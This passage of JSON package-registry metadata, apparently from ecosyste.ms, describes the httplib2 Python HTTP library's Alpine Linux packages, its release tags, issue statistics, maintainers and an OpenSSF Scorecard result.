manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T14:22:36.075Z","dependent_packages_count":4,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":9.767891682785299,"stargazers_count":5.909090909090909,"forks_count":4.090909090909091,"average":4.941972920696324},"purl":"pkg:apk/alpine/py-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.10","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":"fabian@affolter-engineering.ch","url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":254,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T02:18:08.909Z","updated_at":"2023-02-01T02:18:08.909Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.10","url":"https://pkgs.alpinelinux.org/packages?branch=v3.10","ecosystem":"alpine","default":false,"packages_count":10340,"maintainers_count":177,"namespaces_count":2,"keywords_count":925,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":401},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.780Z","updated_at":"2026-08-25T05:05:03.800Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/namespaces"}},{"id":10344530,"name":"py3-httplib2","ecosystem":"alpine","description":"Python3 HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2024-04-12T09:59:22.000Z","latest_release_published_at":"2024-04-12T09:59:22.000Z","latest_release_number":"0.22.0-r2","last_synced_at":"2026-03-10T15:16:35.931Z","created_at":"2024-06-11T09:58:46.248Z","updated_at":"2026-08-21T14:22:36.217Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.20/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit"